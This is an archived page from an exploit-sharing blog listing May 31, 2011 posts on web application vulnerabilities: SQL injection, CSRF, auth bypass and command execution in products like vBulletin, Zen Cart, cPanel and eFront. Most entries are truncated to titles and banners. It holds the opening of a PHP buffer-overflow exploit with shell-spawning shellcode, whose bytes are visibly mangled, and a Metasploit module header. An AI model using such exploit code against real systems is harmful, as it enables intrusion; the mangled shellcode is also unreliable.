Information Security News and Exploits

Providing you with Security News and Exploits from all over the web.

Entries for May 31st, 2011

[webapps / 0day] – InHouse CMS <= SQL Injection Vulnerability

May.31, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – 99ko <= 0.4b Multiple (CSRF/XSRF) Vulnerabilities

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Trade Line Web <= Remote (id) Funcs SQL-i Vulnerabilities

May.31, 2011 in Exploits

Trade Line Web <= Remote ‘id’ Funcs SQL-i Vulnerabilities
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Zen Cart <= v1.3.9h Multiple Vulnerabilities

May.31, 2011 in Exploits

[*]==================================================================>
[*]
[*] Multiple Vulnerabilities in Zen Cart
[*]
[*] [ Vendor SW ] => Zen Cart – http://www.zen-cart.com
[*] [ Version ] => 1.3.9f, 1.3.9h (but possible all versions)
[*] [ Vendor URL ] => www.zen-cart.com
[*] [ Tested on [...]

Leave a Comment

[webapps / 0day] – vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – werkform (index.php) <= SQL Injection Vulnerability

May.31, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – xtcModified <= 1.05 (FCKeditor) Multiple Vulnerabilities

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Homepages Admin (index.php) => Auth Bypass Vulnerability

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – Ciphertek Systems (snapshots/detail) => SQL Injection Vulnerability

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[local exploits] – PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability

May.31, 2011 in Exploits

<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go…n";
define(‘EVIL_SPACE_ADDR’, "xffxffxeexb3");
define(‘EVIL_SPACE_SIZE’, 1024*1024*8);
$SHELLCODE =
"x6ax31×58×99xcdx80×89xc3×89xc1×6ax46×58xcdx80xb0".
"x0bx52×68×6ex2fx73×68×68×2fx2fx62×69×89xe3×89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, [...]

Leave a Comment

[webapps / 0day] – AWStats Totals =< v1.14 multisort Remote Command Execution

May.31, 2011 in Exploits

##
# $Id: awstatstotals_multisort.rb 12715 2011-05-25 10:45:36Z patrickw $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require ‘msf/core’
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
[...]

Leave a Comment

[webapps / 0day] – cPanel < 11.25 CSRF – Add User php Script

May.31, 2011 in Exploits

# Exploit Title: cPanel < 11.25 CSRF – Add php script
# Date: 27.05.2011
# Author: ninjashell
# Software Link: http://cpanel.net
# Version: 11.25 (see details below)
# Tested on: Linux
# CVE : N/A
I. Introduction
cPanel versions below and excluding 11.25 , are vulnerable to CSRF which
leads to uploading a PHP script of the attackers liking. If you have turned
off security [...]

Leave a Comment

[webapps / 0day] – Cotonti <=0.9.2 Multiple Vulnerabilities

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – AlegroCart <= 1.2.x (category_next) Blind SQL Injection Vulnerability

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – html_edit CMS <= 3.1.x Multiple (XSRF/CSRF) Vulnerabilites

May.31, 2011 in Exploits

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ [...]

Leave a Comment

[webapps / 0day] – eFront enterprise <= XSRF (Add admin/change admin passwd)

May.31, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – eFront Community++ <= XSRF (Add admin/change admin passwd)

May.31, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – eFront Educational <=XSRF (Add admin/change admin passwd)

May.31, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – Ishikatech <= SQL injection Vulnerabelity

May.31, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment

[webapps / 0day] – FineArtPost <= SQL injection Vulnerabelity

May.31, 2011 in Exploits

=================================================================================
.__ .__ __ .__ .___
____ ___ _________ [...]

Leave a Comment